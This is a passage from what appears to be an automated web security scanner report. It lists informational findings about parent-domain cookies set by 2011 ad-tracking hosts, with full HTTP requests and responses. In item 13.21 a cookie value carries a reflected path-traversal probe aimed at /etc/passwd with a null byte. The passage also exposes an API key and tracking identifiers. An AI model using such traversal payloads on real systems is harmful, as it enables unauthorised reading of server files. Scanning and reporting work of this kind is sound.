The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?01AD=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg&01RI=5E9E1CAB1AD4553&01NA=&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e68; A28X=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 3605
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 00:45:08 GMT
Connection: close
Set-Cookie: A28X=3KIatKzwD8XkgLR4ju6dOBtbo71SiimUay2RivDe9tJHoFAAUgYCSQg; expires=Sun, 02-Oct-2011 00:45:08 GMT; path=/; domain=.undertone.com
Set-Cookie: UTID=4a03b50017dd46ddaa511cbfbfb29e688473407c8c4fce8899adcc4b; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/
Set-Cookie: _UTLIA[239096]=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: UTLIA=239096.lqz3aw-13473; expires=Tue, 04-Oct-2011 00:45:08 GMT; path=/
Set-Cookie: UTPROFILES=15221%2317%3A1%2C28%7C1022%3A1%7C1023%3A1%7C4209%3A1; expires=Sat, 03-Dec-2011 00:45:08 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write("<"+"SCRIPT language=\'JavaScript1.1\' SRC=\"http://ad.doubleclick.net/adj/N763.no_url_specifiedOX2619/B5770010.3;sz=300x250;pc=[TPAS_ID];click0=http://ads.undertone.com/c?oaparams=2__b
...[SNIP]...

13.15. http://ak1.abmr.net/is/ads.undertone.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/ads.undertone.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-F6248E50D3C9B20BFFF9EB5EA664B56B73DB880669BDB36D0AED2F292EE60908-3CC9ECB738DC6097BABD3A5783E7E50840BA1F5253AE728A47DC91643B7FE4A9; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/ads.undertone.com?U=/ajs.php&V=3-Pk%2fbY9lNQC4At5F94KswkvL1NPSP7nt8HKX%2fF6NhEm5cTN68Tlrp4i2kKFtcogeJ&I=5E9E1CAB1AD4553&D=undertone.com&01AD=1&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=3HA_EEu1KXWRP0QJym87Nlm7xnI-zcps1f5SV9G66zkM0FxK6B8vp8g

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ads.undertone.com/ajs.php?01AD=3LbeoS9TTQFE4L2AwPSPny5JgU_8NH14s0kXLQW6tpcN6pXxIaedm5Q&01RI=5E9E1CAB1AD4553&01NA=&&zoneid=13473&cb=9499299828&t=1315078988.592&fv=10&x=0&y=0&sw=1920&sh=1156&cw=1217&ch=9749&loc=http%3A//content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1&ct=1
Expires: Sun, 04 Sep 2011 00:45:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:45:08 GMT
Connection: close
Set-Cookie: 01AI=2-2-F6248E50D3C9B20BFFF9EB5EA664B56B73DB880669BDB36D0AED2F292EE60908-3CC9ECB738DC6097BABD3A5783E7E50840BA1F5253AE728A47DC91643B7FE4A9; expires=Mon, 03-Sep-2012 00:45:08 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

13.16. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-159DEC38549F1F614D8A2426086D786875EEE45322C9F9736F0A6F6D9BF2D701-1607A532E50134DBA4C933F2985A2049EDBF2DD011F46699E08DEA173165718C; expires=Mon, 03-Sep-2012 01:01:16 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/tag.admeld.com?U=/ad/js/741/mcclatchy/728x90/sacramento_sacbee&V=3-u9rS3RK4%2fHVCpMS5%2fXkUHptR4WXGInZ3QrOhpGcpkOGTF%2fH6Fxq4JA%3d%3d&I=5FB3F64412C0344&D=admeld.com&01AD=1&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-31180B5D5D231F5622E9106D62F00B2EDF4A7C273A353023DD5E966844A1A54B-6809602891ACEF76A3868E1D4796F5A99983F94421DBF59156B8599DC3F68A9D

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.admeld.com/ad/js/741/mcclatchy/728x90/sacramento_sacbee?01AD=32YTIBBAp3mT-Zua6BVL7Ucqbkbllihfkgh02ZrjxdWTDGXg-HimksA&01RI=5FB3F64412C0344&01NA=&t=1315097086910&tz=300&m=2&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&refer=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html
Expires: Sun, 04 Sep 2011 01:01:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:01:16 GMT
Connection: close
Set-Cookie: 01AI=2-2-159DEC38549F1F614D8A2426086D786875EEE45322C9F9736F0A6F6D9BF2D701-1607A532E50134DBA4C933F2985A2049EDBF2DD011F46699E08DEA173165718C; expires=Mon, 03-Sep-2012 01:01:16 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

13.17. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUm1bPVkNOW1aj5XcunNcMDa7Re6IGD4lHbY24BlLWUpAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJP31qI3sBpawEVUJBxdqAyC8xfc9PPC4jRiscMdipXP44sTMcaVpEYlLIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315096942310726%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=Pp1FHRK43Zz2RAI0uRfisMtQb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KdOKh03Kvii5Taj5XcunNcMDa7Re6IGD4lKWNB0md3rj0Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfsp04qHTcqipLlNqPldy6c1wwH4DELwm2ipwNsNipLFWKZvgDTbwiiAhQOisLcafhbACBAJnPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9sU8nhAxdAK9Qieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Sun, 04 Sep 2011 00:57:21 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315096942310726&sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0&industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KUm1bPVkNOW1aj5XcunNcMDa7Re6IGD4lHbY24BlLWUpAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJP31qI3sBpawEVUJBxdqAyC8xfc9PPC4jRiscMdipXP44sTMcaVpEYlLIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

13.18. http://as.casalemedia.com/s previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as.casalemedia.com
Path:	/s

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 01:02:07 GMT
CMST=TmLJ305izg8C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT
CMDD=AAF1owI*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s?s=102679&u=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&f=1&id=5352232557.328876 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMS=65131&1314825471&95308&1314825468; CMD1=AAErg05epP8AAP5rAAL86wEBAAABTHFOXqT8AAF0TAADQ4wBAQA*

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Length: 0
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 01:02:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:02:07 GMT
Connection: close
Set-Cookie: CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 01:02:07 GMT
Set-Cookie: CMPS=179;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 01:02:07 GMT
Set-Cookie: CMPP=016;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 01:02:07 GMT
Set-Cookie: CMST=TmLJ305izg8C;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT
Set-Cookie: CMDD=AAF1owI*;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 01:02:07 GMT

13.19. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:42:17 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035223&c3=&c4=&c5=&c6=&c15=&ns__t=1315096975227&ns_c=UTF-8&c8=Blog%3A%20Stay%20updated%20on%20Oregon-LSU%20and%20other%20college%20football%20action&c7=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&c9=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 04 Sep 2011 00:42:17 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:42:17 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.20. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:43:15 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=7&c2=2000002&c3=1&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 00:43:15 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 00:43:15 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.21. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:08:16 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035363&d.c=gif&d.o=nmcharlotte&d.x=221978921&d.t=page&d.u=http%3A%2F%2Fwww.charlotteobserver.com%2F2011%2F09%2F03%2F2577566%2Fraceday-danica-already-gone.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 01:08:16 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633../../../../../../../../etc/passwd%009951d9b8-80.67.74.150-1314793633; expires=Tue, 03-Sep-2013 01:08:16 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.22. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

V=LZLz3N9wRgPO; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 01:21:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bh/rtset HTTP/1.1
Host: bh.contextweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app604
Cache-Control: no-cache, no-store
Set-Cookie: V=LZLz3N9wRgPO; Domain=.contextweb.com; Expires=Wed, 29-Aug-2012 01:21:59 GMT; Path=/
Content-Length: 0
Date: Sun, 04 Sep 2011 01:21:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

13.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFad=2:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fm.js HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 987
Content-Type: application/x-javascript
Set-Cookie: FFad=2:12:9:9:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:305,825,15:305,825,0:0,825,15:305,0,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "8710bb37-8952-4aa4e77af70c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=209
Expires: Sun, 04 Sep 2011 01:25:35 GMT
Date: Sun, 04 Sep 2011 01:22:06 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/c5;referrer='+document.referrer+';tag=c7.ze
...[SNIP]...

13.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=67:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:54f5b;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=67:4:4:0:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=196
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:47 GMT
Content-Length: 910
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='54f5b';
...[SNIP]...

13.25. http://c7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PI=h639958Za722607Zc305000825,305000825Zs263Zt1246;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h639958Za722607Zc305000825%2C305000825Zs263Zt1246&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h639958Za722607Zc305000825,305000825Zs263Zt1246;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1467
Date: Sun, 04 Sep 2011 01:05:03 GMT
Connection: close

13.26. http://clk.fetchback.com/serve/fb/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=1_1315099337_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
cre=1_1315099337_34024:68292:2:121174:121256; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 01:22:17 GMT; Path=/
